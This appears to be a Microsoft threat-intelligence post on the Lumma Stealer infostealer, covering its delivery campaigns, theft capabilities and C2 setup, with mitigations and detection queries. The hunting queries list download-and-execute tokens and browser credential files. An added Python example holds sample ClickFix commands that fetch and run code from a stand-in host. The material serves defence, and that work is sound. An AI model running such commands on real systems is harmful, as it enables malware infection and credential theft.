Lumma Stealer: Breaking down the delivery techniques and capabilities of a prolific infostealer

May 21, 2025

Over the past year, Microsoft has closely monitored the increasing sophistication and prevalence of Lumma Stealer, an infostealer malware employed by various financially motivated threat actors across multiple sectors. Our investigation into Lumma Stealer’s distribution framework has unveiled a complex and resilient ecosystem that utilizes phishing, malvertising, exploitation of trusted platforms, and traffic distribution systems. These insights highlight the critical need for collaborative efforts to combat cybercrime. In partnership with industry stakeholders and international law enforcement, Microsoft recently played a pivotal role in disrupting Lumma’s infrastructure.

Lumma Stealer, also referred to as LummaC2, operates as a malware-as-a-service (MaaS) solution capable of extracting data from a range of browsers and applications, including cryptocurrency wallets, while also facilitating the installation of additional malware. Microsoft Threat Intelligence identifies the entity behind Lumma as Storm-2477, which maintains the malware, its command-and-control (C2) infrastructure, and the Lumma MaaS. Affiliates who subscribe to Storm-2477 can access a panel to create the malware binary and manage C2 communications along with the information obtained from victims. Notably, ransomware groups such as Octo Tempest, Storm-1607, Storm-1113, and Storm-1674 have incorporated Lumma Stealer into their operations.

Lumma Stealer delivery techniques

Lumma Stealer employs a diverse and evolving array of delivery mechanisms. Campaigns frequently integrate multiple techniques, dynamically adjusting to evade detection and enhance infection rates. The delivery infrastructure is designed to be transient, swiftly shifting across domains, platforms, and geographical locations to avoid disruption.

  • Phishing emails: Lumma Stealer campaigns often utilize emails that impersonate reputable brands and services, delivering links or attachments designed to create a sense of urgency. These emails may appear as critical hotel reservation confirmations or pending cancellations, directing victims to cloned websites or malicious servers that execute the Lumma payload.
  • Malvertising: Threat actors inject deceptive advertisements into search engine results, targeting software-related queries such as “Notepad++ download” or “Chrome update.” Clicking these tainted links leads users to counterfeit websites that closely resemble legitimate vendors, ultimately delivering Lumma Stealer.
  • Drive-by downloads on compromised websites: Attackers have been observed compromising legitimate websites, typically exploiting vulnerabilities or misconfigurations. They alter site content to insert malicious JavaScript, which executes when unsuspecting users visit the sites, delivering payloads or prompting users to take further actions.
  • Trojanized applications: In numerous campaigns, cracked or pirated versions of legitimate applications are bundled with Lumma binaries and disseminated via file-sharing platforms. These modified installers often operate silently, executing the malware post-launch without any visible payload during installation.
  • Abuse of legitimate services and ClickFix: Public repositories like GitHub are exploited to host scripts and binaries disguised as tools or utilities. A particularly deceptive tactic involves fake CAPTCHA pages, commonly seen in the ClickFix ecosystem, where targets are misled into executing malicious commands under the guise of passing a verification check.
  • Dropped by other malware: Microsoft Threat Intelligence has noted that other loaders and malware, such as DanaBot, have delivered Lumma Stealer as an additional payload.

These methods reflect the behavior of threat actors who prioritize the exploitation of user trust, manipulation of legitimate infrastructure, and multi-layered distribution chains designed to circumvent both technical and human defenses. The following sections delve into specific campaigns that employed these distribution techniques to deliver Lumma Stealer.

Drive-by download campaign leveraging EtherHiding and ClickFix to deliver Lumma

In early April 2025, Microsoft detected a cluster of compromised websites utilizing EtherHiding and ClickFix techniques to install Lumma Stealer. EtherHiding involves leveraging smart contracts on blockchain platforms like Binance Smart Chain (BSC) to host segments of malicious code, rendering traditional blocking methods less effective. Meanwhile, the ClickFix technique exploits human problem-solving tendencies by displaying fake error messages that instruct users to copy and paste commands, ultimately leading to malware downloads.

During this campaign, the JavaScript injected into compromised websites directly contacted BSC to retrieve the ClickFix code, which was then presented to the target. Users were prompted to click an “I’m not a robot” checkbox, which copied a command into their clipboard. They were subsequently instructed to paste and execute this command via the Windows Run prompt, resulting in the download and execution of further code.

Email campaign targeting organizations in Canada to deliver Lumma Stealer

On April 7, 2025, Microsoft Threat Intelligence observed an extensive email campaign targeting organizations in Canada. The emails employed invoice lures related to fitness plans or online education platforms, with subject lines personalized to include recipient-specific details. This attack chain utilized various tools available on underground forums for traffic filtering and social engineering.

The emails contained URLs leading to the Prometheus traffic direction system (TDS) hosted on numerous compromised sites, which redirected users to an attacker-controlled website that hosted the ClickFix framework. Similar to the previous campaign, targets were instructed to click an “I’m not a robot” prompt and execute malicious code through a multi-step process. The malicious code initiated a PowerShell command that ultimately downloaded and executed a Lumma Stealer executable, which notably included XWorm malware.

Lumma Stealer malware analysis

The core Lumma Stealer malware is written in a combination of C++ and assembly (ASM) and is designed as a MaaS offering. Threat actors can access a panel to create the malware binary and manage C2 communications and stolen information. The core binary employs advanced obfuscation techniques, including low-level virtual machine (LLVM core) based obfuscation, control flow flattening (CFF), and customized stack decryption, making static analysis challenging. Most critical APIs are invoked through low-level syscalls and the Heaven's Gate technique.

Process injection and process hollowing

Lumma loader may utilize process hollowing to inject its malicious payload into legitimate system processes, such as msbuild.exe, regasm.exe, regsvcs.exe, and explorer.exe. This technique allows the malware to execute under the guise of trusted binaries, evading behavioral detection and endpoint monitoring tools.

Information-stealing capabilities

Lumma Stealer is designed to extract a wide range of user data through specialized routines for each data type. These capabilities have evolved, with recent observations indicating that instructions for targeting credentials are specified in the configuration file retrieved from the active C2 server. The configuration file is organized into sections detailing target applications for cryptocurrency wallets and extensions, as well as browser applications and user file locations.

  • Browser credentials and cookies: Lumma Stealer extracts saved passwords, session cookies, and autofill data from Chromium-based browsers, including Edge, as well as Mozilla browsers.
  • Cryptocurrency wallets and extensions: The malware actively searches for wallet files, browser extensions, and local keys associated with wallets like MetaMask, Electrum, and Exodus.
  • Various applications: Lumma Stealer targets data from virtual private networks (VPNs), email clients, FTP clients, and Telegram applications.
  • User documents: The malware harvests files from user profiles and common directories, particularly those with .pdf, .docx, or .rtf extensions.
  • System metadata: Lumma Stealer collects telemetry data such as CPU information, OS version, system locale, and installed applications to tailor future exploits or profile victims.

C2 communication

Lumma Stealer maintains a robust C2 infrastructure, utilizing a combination of hardcoded tier 1 C2s that are regularly updated and reordered, alongside fallback C2s hosted on platforms like Steam and Telegram. The Telegram C2 is prioritized, while the Steam C2 is checked only when all hardcoded C2s are inactive. To obscure the actual C2 servers, all communications are routed through a Cloudflare proxy.

Affiliates can share tier 1 C2s, with the option to add a personal tier 1 C2 domain for an additional fee. Various obfuscation techniques protect the C2 servers, with different encryption methods applied to each set of servers. For instance, hardcoded C2s and Telegram fallback URLs are secured with ChaCha20 encryption, while Steam profile fallback URLs utilize a custom stack-based encryption algorithm that varies with each Lumma malware version.

Microsoft’s Digital Crimes Unit (DCU) has developed tools to identify and map the Lumma Stealer C2 infrastructure. As part of the disruption effort announced on May 21, Microsoft’s DCU has facilitated the takedown, suspension, and blocking of approximately 2,300 malicious domains that constituted the backbone of the Lumma Stealer infrastructure.

Recommendations

To mitigate the impact of Lumma Stealer, Microsoft Threat Intelligence recommends the following measures:

Strengthen Microsoft Defender for Endpoint configuration

  • Ensure tamper protection is enabled in Microsoft Defender for Endpoint.
  • Enable network protection in Microsoft Defender for Endpoint.
  • Activate web protection.
  • Run endpoint detection and response (EDR) in block mode to remediate malicious artifacts detected post-breach.
  • Configure investigation and remediation in fully automated mode to allow immediate action on alerts.
  • Microsoft Defender XDR customers can enable attack surface reduction rules to prevent common attack techniques.

Strengthen operating environment configuration

  • Implement multifactor authentication (MFA) to enhance identity security.
  • Utilize phishing-resistant authentication methods such as FIDO tokens or Microsoft Authenticator with passkey.
  • Enforce Entra ID Conditional Access authentication strength for critical applications.
  • Encourage the use of Microsoft Edge with Microsoft Defender SmartScreen for enhanced protection against malicious sites.
  • Enable Network Level Authentication for Remote Desktop Service connections.
  • Activate Local Security Authority (LSA) protection to prevent credential theft.
  • Utilize AppLocker to restrict access to specific software tools within the organization.

Detection details

Microsoft Defender XDR customers can refer to the following list of applicable detections related to Lumma Stealer:

Microsoft Defender Antivirus

Microsoft Defender Antivirus identifies this threat as the following malware:

Microsoft Defender for Endpoint

The following alerts may indicate threat activity associated with Lumma Stealer:

  • Suspicious command in RunMRU registry
  • Possible Lumma Stealer activity
  • Information stealing malware activity
  • Suspicious PowerShell command line
  • Use of living-off-the-land binary to run malicious code
  • Possible theft of passwords and sensitive web browser information
  • Suspicious DPAPI Activity
  • Suspicious mshta process launched
  • Renamed AutoIt tool
  • Suspicious phishing activity detected
  • Suspicious implant process from a known emerging threat
  • A process was injected with potentially malicious code
  • Process hollowing detected
  • Suspicious PowerShell download or encoded command execution
  • A process was launched on a hidden desktop

Microsoft Defender for Office 365

Microsoft Defender for Office 365 detects and blocks the malicious emails used in these campaigns. The following alerts may indicate related activity, although they can also be triggered by unrelated threats:

  • A potentially malicious URL click was detected
  • Email messages containing malicious URLs removed after delivery
  • Email messages removed after delivery
  • A user clicked through to a potentially malicious URL
  • Suspicious email sending patterns detected
  • Email reported by user as malware or phishing

Defender for Office 365 also detects and blocks Prometheus TDS, EtherHiding patterns, and ClickFix landing pages.

Microsoft Security Copilot

Customers utilizing Security Copilot can leverage the standalone experience to create custom prompts or execute pre-built promptbooks for automating incident response or investigation tasks related to Lumma Stealer:

  • Incident investigation
  • Microsoft User analysis
  • Threat actor profile
  • Threat Intelligence 360 report based on MDTI article
  • Vulnerability impact assessment

Some promptbooks may require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.

Threat intelligence reports

Microsoft customers can access the following reports within Microsoft products to obtain the latest information regarding threat actors, malicious activities, and techniques discussed in this blog. These reports provide essential intelligence, protection information, and recommended actions to prevent, mitigate, or respond to threats identified in customer environments.

Microsoft Defender Threat Intelligence

Customers utilizing Microsoft Security Copilot can also access the integration within Microsoft Defender Threat Intelligence for further insights into this threat actor.

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can execute the following query to identify related activities within their networks:

ClickFix commands execution

DeviceRegistryEvents
| where ActionType =~ "RegistryValueSet"
// RunMRU (Run-dialog history) is written by explorer.exe when a user pastes a command into Win+R
| where InitiatingProcessFileName =~ "explorer.exe"
| where RegistryKey has @"CurrentVersion\Explorer\RunMRU"
// Green tick that ClickFix lures append to the pasted command
| where RegistryValueData has "✅"
        // LOLBin plus non-Latin script (Cyrillic, Greek, Hebrew, Arabic, Thai, Coptic, Cherokee, Armenian, Georgian, Devanagari)
        or (RegistryValueData has_any ("powershell", "mshta", "curl", "msiexec", "^")
             and RegistryValueData matches regex "[\u0400-\u04FF\u0370-\u03FF\u0590-\u05FF\u0600-\u06FF\u0E00-\u0E7F\u2C80-\u2CFF\u13A0-\u13FF\u0530-\u058F\u10A0-\u10FF\u0900-\u097F]")
        // mshta with arguments; RunMRU entries end in "\1", so a bare "mshta.exe\1" is excluded
        or (RegistryValueData has "mshta" and RegistryValueName !~ "MRUList" and RegistryValueData !in~ (@"mshta.exe\1", @"mshta\1"))
        or (RegistryValueData has_any ("bitsadmin", "forfiles", "ProxyCommand=") and RegistryValueName !~ "MRUList")
        // cmd/powershell one-liners carrying download-and-execute tokens or an encoded command
        or ((RegistryValueData startswith "cmd" or RegistryValueData startswith "powershell")
            and (RegistryValueData has_any ("-W Hidden ", " -eC ", "curl", "E:jscript", "ssh", "Invoke-Expression", "UtcNow", "Floor", "DownloadString", "DownloadFile", "FromBase64String", "System.IO.Compression", "System.IO.MemoryStream", "iex", "Invoke-WebRequest", "iwr", "Get-ADDomainController", "InstallProduct", "-w h", "-X POST", "Invoke-RestMethod", "-NoP -W", ".InVOKe", "-useb", "irm ", "^", "[char]", "[scriptblock]", "-UserAgent", "UseBasicParsing", ".Content")
              or RegistryValueData matches regex @"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\s[A-Za-z0-9+/=]{15,}"))
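The RunMRU heuristics of the query above, re-implemented in Python as an added example (not Microsoft's code or the Defender query engine) and run over constructed RunMRU registry events; lower-cased substring tests stand in for KQL's term-based has/has_any, and the lure text and lure.invalid URLs are made up.

```python
import re

# Non-Latin script ranges from the query (Cyrillic, Greek, Hebrew, Arabic, Thai, Coptic, ...).
NON_LATIN = re.compile("[\u0400-\u04FF\u0370-\u03FF\u0590-\u05FF\u0600-\u06FF\u0E00-\u0E7F"
                       "\u2C80-\u2CFF\u13A0-\u13FF\u0530-\u058F\u10A0-\u10FF\u0900-\u097F]")
# "-e / -enc / -EncodedCommand <base64>" arguments, including caret-obfuscated spellings.
ENCODED_ARG = re.compile(r"[-/\u2013][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\s[A-Za-z0-9+/=]{15,}")
LOLBINS = ("powershell", "mshta", "curl", "msiexec", "^")
LOADER_TOKENS = ("-w hidden ", " -ec ", "curl", "e:jscript", "ssh", "invoke-expression",
                 "downloadstring", "downloadfile", "frombase64string", "iex", "invoke-webrequest",
                 "iwr", "-w h", "-x post", "invoke-restmethod", "-nop -w", "-useb", "irm ", "^",
                 "[char]", "[scriptblock]", "-useragent", "usebasicparsing", ".content")
BENIGN_MSHTA = ("mshta.exe\\1", "mshta\\1")  # bare mshta Run entries; RunMRU data ends in "\1"
KEY = r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

def is_clickfix_runmru(event: dict) -> bool:
    """Apply the query's branches to one DeviceRegistryEvents-style record (a dict)."""
    if event.get("ActionType", "").lower() != "registryvalueset":
        return False
    if event.get("InitiatingProcessFileName", "").lower() != "explorer.exe":
        return False
    if "currentversion\\explorer\\runmru" not in event.get("RegistryKey", "").lower():
        return False
    data = event.get("RegistryValueData", "")
    low, name = data.lower(), event.get("RegistryValueName", "").lower()
    if "\u2705" in data:  # the green tick many fake-CAPTCHA lures append to the command
        return True
    if any(t in low for t in LOLBINS) and NON_LATIN.search(data):
        return True
    if "mshta" in low and name != "mrulist" and low not in BENIGN_MSHTA:
        return True
    if any(t in low for t in ("bitsadmin", "forfiles", "proxycommand=")) and name != "mrulist":
        return True
    if low.startswith(("cmd", "powershell")):
        return any(t in low for t in LOADER_TOKENS) or ENCODED_ARG.search(data) is not None
    return False

def _evt(name, data, proc="explorer.exe"):
    return {"ActionType": "RegistryValueSet", "InitiatingProcessFileName": proc,
            "RegistryKey": KEY, "RegistryValueName": name, "RegistryValueData": data}

# Constructed sample telemetry (not real data). RunMRU stores each Run-dialog entry as a
# lettered value whose data ends in "\1", plus an MRUList value that records the order.
SAMPLE_EVENTS = [
    _evt("a", "powershell -w hidden -c \"iwr http://lure.invalid/x | iex\" # \u2705 I am not a robot\\1"),
    _evt("b", "mshta http://lure.invalid/p # \u042f \u043d\u0435 \u0440\u043e\u0431\u043e\u0442\\1"),  # Cyrillic text
    _evt("c", "powershell -enc aGVsbG8gd29ybGQgdGhpcyBpcyBsb25n\\1"),
    _evt("MRUList", "cba"),
    _evt("d", "notepad.exe\\1"),
    _evt("e", "mshta.exe\\1"),                              # bare mshta entry the query excludes
    _evt("f", "mshta x # \u2705\\1", proc="regedit.exe"),   # not written by explorer.exe
]

def flag_events(events):  # names of the matching RunMRU values; ['a', 'b', 'c'] for SAMPLE_EVENTS
    return [e["RegistryValueName"] for e in events if is_clickfix_runmru(e)]
```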

DPAPI decryption via AutoIT or .NET Framework processes

DeviceEvents
| where ActionType == "DpapiAccessed"
// AutoIt-compiled loaders, .NET Framework hosts (process hollowing targets) and PowerShell
| where InitiatingProcessVersionInfoInternalFileName == "AutoIt3.exe"
      or InitiatingProcessImageFilePath has @"windows\microsoft.net\framework"
      or InitiatingProcessFileName =~ "powershell.exe"
// Cheap text pre-filter before parsing JSON; kept in step with the dataDesp list below
| where AdditionalFields has_any ("Google Chrome", "Microsoft Edge", "Chromium", "Opera", "IMAP Password", "Brave Browser", "AVG Secure Browser")
      and AdditionalFields has "SPCryptUnprotect"
| extend json = parse_json(AdditionalFields)
| extend dataDesp = tostring(json.DataDescription.PropertyValue)
| extend opType = tostring(json.OperationType.PropertyValue)
// Browser (and mail) secrets being unprotected by a process that is not the browser
| where dataDesp in~ ("Google Chrome", "Microsoft Edge", "Chromium", "Opera", "Opera GX", "IMAP Password", "Brave Browser", "AVG Secure Browser")
        and opType =~ "SPCryptUnprotect"
| project Timestamp, ReportId, DeviceId, ActionType, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, AdditionalFields, dataDesp, opType

Sensitive browser file access via AutoIT or .NET Framework processes

let browserDirs = pack_array(@"Google\Chrome\User Data", @"Microsoft\Edge\User Data", @"Mozilla\Firefox\Profiles");
let browserSensitiveFiles = pack_array("Web Data", "Login Data", "key4.db", "formhistory.sqlite", "cookies.sqlite", "logins.json", "places.sqlite", "cert9.db");
DeviceEvents
| where AdditionalFields has "FileOpenSource" // keep only file-open events
| where InitiatingProcessVersionInfoInternalFileName == "AutoIt3.exe"
      or InitiatingProcessImageFilePath has @"windows\microsoft.net\framework"
      or InitiatingProcessFileName =~ "powershell.exe"
| where AdditionalFields has_any (browserDirs) or AdditionalFields has_any (browserSensitiveFiles)
| extend json = parse_json(AdditionalFields)
| extend File_Name = tostring(json.FileName.PropertyValue)
// Require both a browser profile directory and a credential/cookie store in the opened path
| where File_Name has_any (browserDirs) and File_Name has_any (browserSensitiveFiles)
| project Timestamp, ReportId, DeviceId, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, File_Name

Learn more

For the latest security research from the Microsoft Threat Intelligence community, visit the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To stay informed about new publications and engage in discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, on X (formerly Twitter) at https://x.com/MsftSecIntel, and on Bluesky at https://bsky.app/profile/threatintel.microsoft.com.

For insights and stories from the Microsoft Threat Intelligence community regarding the evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.
